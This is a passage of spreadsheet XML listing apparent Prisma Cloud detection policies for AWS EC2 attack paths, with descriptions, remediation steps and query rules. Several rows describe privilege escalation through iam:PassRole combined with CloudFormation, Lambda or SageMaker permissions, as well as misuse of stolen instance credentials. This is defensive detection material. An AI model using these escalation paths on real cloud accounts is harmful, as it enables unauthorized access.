      <c r="J1797" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1797" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to AWS EC2 instance with unusual usage of instance role credentials and privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1797" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1797" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1797" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1797" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1797" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1797" t="inlineStr"/>
      <c r="R1797" t="inlineStr"/>
      <c r="S1797" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1797" t="b">
        <v>0</v>
      </c>
      <c r="U1797" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1797" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1797" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and granted privilege escalation permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to gain access to the EC2 instance and leverage access on the instance leading to privilege escalation and unauthorized actions in the cloud account. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following privilege escalation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unusual usage activity of instance role credentials and risky privilege escalation permissions.</t>
        </is>
      </c>
      <c r="X1797" t="inlineStr">
        <is>
          <t>[ANOMALY]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797" t="inlineStr"/>
      <c r="Z1797" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS EC2 instance with privilege escalation risk permissions')</t>
        </is>
      </c>
      <c r="AA1797" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1797" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:29</t>
        </is>
      </c>
      <c r="AC1797" t="inlineStr"/>
      <c r="AD1797" t="b">
        <v>1</v>
      </c>
      <c r="AE1797" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1797" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>f7147908-1ecc-4441-9e8a-89a7f2f39de9</t>
        </is>
      </c>
      <c r="AI1797" t="inlineStr">
        <is>
          <t>326f5c84-bf12-4b1b-b0b9-115ee38ed33d</t>
        </is>
      </c>
      <c r="AJ1797" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1797" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1798">
      <c r="A1798" t="inlineStr"/>
      <c r="B1798" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1798" s="2" t="inlineStr"/>
      <c r="D1798" t="inlineStr"/>
      <c r="E1798" t="inlineStr"/>
      <c r="F1798" t="inlineStr"/>
      <c r="G1798" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1798" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1798" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable AWS EC2 instance [Kubernetes, CVE-2022-2385]</t>
        </is>
      </c>
      <c r="L1798" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1798" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1798" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1798" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1798" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1798" t="inlineStr"/>
      <c r="R1798" t="inlineStr"/>
      <c r="S1798" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1798" t="b">
        <v>0</v>
      </c>
      <c r="U1798" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1798" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1798" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-2385].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Kubernetes [CVE-2022-2385] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X179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CVE-2022-2385
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-2385</t>
        </is>
      </c>
      <c r="Y1798" t="inlineStr"/>
      <c r="Z1798" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-2385'))</t>
        </is>
      </c>
      <c r="AA1798" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1798" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1798" t="inlineStr"/>
      <c r="AD1798" t="b">
        <v>1</v>
      </c>
      <c r="AE1798" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1798" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>1a0cbe37-d3c2-40c1-aa13-072d01214690</t>
        </is>
      </c>
      <c r="AI1798" t="inlineStr">
        <is>
          <t>fdf1e879-22f5-4144-a0b9-13b514c9f8e6</t>
        </is>
      </c>
      <c r="AJ1798" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1798" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1799">
      <c r="A1799" t="inlineStr"/>
      <c r="B1799" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1799" s="2" t="inlineStr"/>
      <c r="D1799" t="inlineStr"/>
      <c r="E1799" t="inlineStr"/>
      <c r="F1799" t="inlineStr"/>
      <c r="G1799" t="b">
        <v>1</v>
      </c>
      <c r="H17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799" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1799" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1799" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with iam:PassRole and AWS CloudFormation stack IAM permissions</t>
        </is>
      </c>
      <c r="L1799" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1799" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1799" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1799" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1799" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1799" t="inlineStr"/>
      <c r="R1799" t="inlineStr"/>
      <c r="S1799" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1799" t="b">
        <v>0</v>
      </c>
      <c r="U1799" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1799" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1799" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and privilege escalation permission via PassRole &amp; CloudFormation stack permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An attacker with access to the PassRole and CloudFormation stack permissions can create a new CloudFormation stack and pass a more privileged role to it. This allows an adversary to escalate to a more privileged access role and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following privilege escalation permissions:
'iam:PassRole', 'cloudformation:CreateStack', 'cloudformation:DescribeStacks'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1799"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 cloud formation stack, make sure the policy is scoped to only the resources needed.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799" t="inlineStr"/>
      <c r="Z1799" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows Privilege escalation via PassRole &amp; CloudFormation stack permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1799" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1799" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1799" t="inlineStr"/>
      <c r="AD1799" t="b">
        <v>1</v>
      </c>
      <c r="AE1799" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1799" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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799" t="inlineStr">
        <is>
          <t>4ddeae3c-ae75-491a-8bff-e53847e7dab1</t>
        </is>
      </c>
      <c r="AI1799" t="inlineStr">
        <is>
          <t>515bc1ad-adce-4b56-8620-9fb3c94dc57e</t>
        </is>
      </c>
      <c r="AJ1799" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1799" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1800">
      <c r="A1800" t="inlineStr"/>
      <c r="B1800" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1800" s="2" t="inlineStr"/>
      <c r="D1800" t="n">
        <v>1</v>
      </c>
      <c r="E1800" t="n">
        <v>0</v>
      </c>
      <c r="F1800" t="n">
        <v>0</v>
      </c>
      <c r="G1800" t="b">
        <v>1</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1800" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1800" t="inlineStr">
        <is>
          <t>Privilege escalation and unauthorized access risk due to a publicly exposed AWS EC2 instance with iam:Passrole, lambda:CreateFunction and lambda:InvokeFunction permissions</t>
        </is>
      </c>
      <c r="L1800" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1800" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1800" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1800" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1800" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1800" t="inlineStr"/>
      <c r="R1800" t="inlineStr"/>
      <c r="S1800" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1800" t="b">
        <v>0</v>
      </c>
      <c r="U1800" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1800" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1800" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and 'iam:PassRole', 'lambda:CreateFunction', 'lambda:InvokeFunction' permissions that could potentially lead to privilege escalation.
Publicly exposed EC2 instance having risky privilege escalation IAM permissions on the instance help the attackers to escalate their privilege and move laterally to perform unauthorized actions in the cloud account.
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X180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Do not use wildcards in a policy's statement Resource element with these permissions, as it creates a risk of Privilege Escalation. If identity requires the use of these permissions to pass a role to a Lambda function, make sure the policy is scoped to only the resources needed. See the following example: https://aws.amazon.com/premiumsupport/knowledge-center/granular-access-lambda/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1800" t="inlineStr"/>
      <c r="Z1800" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows Privilege escalation via PassRole &amp; Lambda create &amp; invoke Function permissions')</t>
        </is>
      </c>
      <c r="AA1800" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1800" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC1800" t="inlineStr"/>
      <c r="AD1800" t="b">
        <v>1</v>
      </c>
      <c r="AE1800" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1800" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>f298bc78-d871-4531-93a2-5225325c3a6e</t>
        </is>
      </c>
      <c r="AI1800" t="inlineStr">
        <is>
          <t>3ec47170-eed5-4c07-bf3e-e0e06a95c209</t>
        </is>
      </c>
      <c r="AJ1800" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1800" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" t="inlineStr"/>
      <c r="B1801" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1801" s="2" t="inlineStr"/>
      <c r="D1801" t="inlineStr"/>
      <c r="E1801" t="inlineStr"/>
      <c r="F1801" t="inlineStr"/>
      <c r="G1801" t="b">
        <v>1</v>
      </c>
      <c r="H18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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1801" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1801" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable AWS EC2 instance [Python, CVE-2021-20270]</t>
        </is>
      </c>
      <c r="L1801" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1801" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1801" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1801" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1801" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1801" t="inlineStr"/>
      <c r="R1801" t="inlineStr"/>
      <c r="S1801" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1801" t="b">
        <v>0</v>
      </c>
      <c r="U1801" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1801" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1801" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances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AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2021-20270] vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X180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1801" t="inlineStr"/>
      <c r="Z1801" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA1801" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1801" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:57</t>
        </is>
      </c>
      <c r="AC1801" t="inlineStr"/>
      <c r="AD1801" t="b">
        <v>1</v>
      </c>
      <c r="AE1801" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1801" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
          <t>e56ba791-a97a-4e03-a0e3-c085200b5c74</t>
        </is>
      </c>
      <c r="AI1801" t="inlineStr">
        <is>
          <t>c628b04c-6373-4588-9a86-66f12985f0f4</t>
        </is>
      </c>
      <c r="AJ1801" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1801" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1802">
      <c r="A1802" t="inlineStr"/>
      <c r="B1802" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1802" s="2" t="inlineStr"/>
      <c r="D1802" t="inlineStr"/>
      <c r="E1802" t="inlineStr"/>
      <c r="F1802" t="inlineStr"/>
      <c r="G1802" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1802" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1802" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with iam:PassRole and AWS SageMaker IAM permissions</t>
        </is>
      </c>
      <c r="L1802" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1802" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1802" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1802" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1802" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1802" t="inlineStr"/>
      <c r="R1802" t="inlineStr"/>
      <c r="S1802" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1802" t="b">
        <v>0</v>
      </c>
      <c r="U1802" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1802" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1802" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and privilege escalation permission via PassRole &amp; SageMaker permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An attacker with access to the PassRole and SageMaker permissions can create a new training job, processing job or notebook and pass a more privileged existing role to it. This would allows an adversary to escalate privileges to the more privileged role.
This policy checks for the following privilege escalation permissions:
'iam:PassRole', 'sagemaker:CreateProcessingJob', 'sagemaker:CreateNotebookInstance', 'sagemaker:CreateTrainingJob' permissions.
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1802"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02" t="inlineStr"/>
      <c r="Z1802" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS IAM policy allows Privilege escalation via PassRole &amp; SageMaker create training job permissions' or 'AWS IAM policy allows Privilege escalation via PassRole &amp; SageMaker create notebook permissions' or 'AWS IAM policy allows Privilege escalation via PassRole &amp; SageMaker create processing job permissions')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1802" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1802" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1802" t="inlineStr"/>
      <c r="AD1802" t="b">
        <v>1</v>
      </c>
      <c r="AE1802" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1802" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>60036b2b-8ee9-4b13-8c76-33e894c59940</t>
        </is>
      </c>
      <c r="AI1802" t="inlineStr">
        <is>
          <t>5766413d-54f9-4898-b6fc-09820820b34e</t>
        </is>
      </c>
      <c r="AJ1802" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1802" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1803">
      <c r="A1803" t="inlineStr"/>
      <c r="B1803" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1803" s="2" t="inlineStr"/>
      <c r="D1803" t="inlineStr"/>
      <c r="E1803" t="inlineStr"/>
      <c r="F1803" t="inlineStr"/>
      <c r="G1803" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1803" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1803" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Redis Servers in Debian Linux, CVE-2022-0543)</t>
        </is>
      </c>
      <c r="L1803" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1803" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1803" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1803" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1803" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1803" t="inlineStr"/>
      <c r="R1803" t="inlineStr"/>
      <c r="S1803" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1803" t="b">
        <v>0</v>
      </c>
      <c r="U1803" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1803" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1803" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-0543).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Redis Servers in Debian Linux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Redis Servers in Debian Linux (CVE-2022-0543) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1803"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CVE-2022-0543
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0543</t>
        </is>
      </c>
      <c r="Y1803" t="inlineStr"/>
      <c r="Z1803" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-0543'))</t>
        </is>
      </c>
      <c r="AA1803" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1803" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:19</t>
        </is>
      </c>
      <c r="AC1803" t="inlineStr"/>
      <c r="AD1803" t="b">
        <v>1</v>
      </c>
      <c r="AE1803" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1803" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>d7a92974-e2b9-4a62-94e2-e1e68c0848bc</t>
        </is>
      </c>
      <c r="AI1803" t="inlineStr">
        <is>
          <t>dd4744d8-37a4-4bd6-a1f9-6bd4047975ec</t>
        </is>
      </c>
      <c r="AJ1803" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1803" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" t="inlineStr"/>
      <c r="B1804" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1804" s="2" t="inlineStr"/>
      <c r="D1804" t="inlineStr"/>
      <c r="E1804" t="inlineStr"/>
      <c r="F1804" t="inlineStr"/>
      <c r="G1804" t="b">
        <v>1</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1804" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1804" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [GLPI Project, CVE-2022-35914]</t>
        </is>
      </c>
      <c r="L1804" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1804" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1804" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1804" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1804" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1804" t="inlineStr"/>
      <c r="R1804" t="inlineStr"/>
      <c r="S1804" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1804" t="b">
        <v>0</v>
      </c>
      <c r="U1804" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1804" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1804" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[GLPI Project, CVE-2022-35914].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of GLPI Project software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the GLPI Project RCE [CVE-2022-35914] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X180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CVE-2022-35914
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-35914</t>
        </is>
      </c>
      <c r="Y1804" t="inlineStr"/>
      <c r="Z1804" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-35914 - GLPI Project RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-35914'))</t>
        </is>
      </c>
      <c r="AA1804" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1804" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:33</t>
        </is>
      </c>
      <c r="AC1804" t="inlineStr"/>
      <c r="AD1804" t="b">
        <v>1</v>
      </c>
      <c r="AE1804" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1804" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>38a8f6b1-133b-42b8-95e1-071c52225a35</t>
        </is>
      </c>
      <c r="AI1804" t="inlineStr">
        <is>
          <t>2e0d739e-56e3-4d88-9585-4f5007f1e078</t>
        </is>
      </c>
      <c r="AJ1804" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1804" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" t="inlineStr">
        <is>
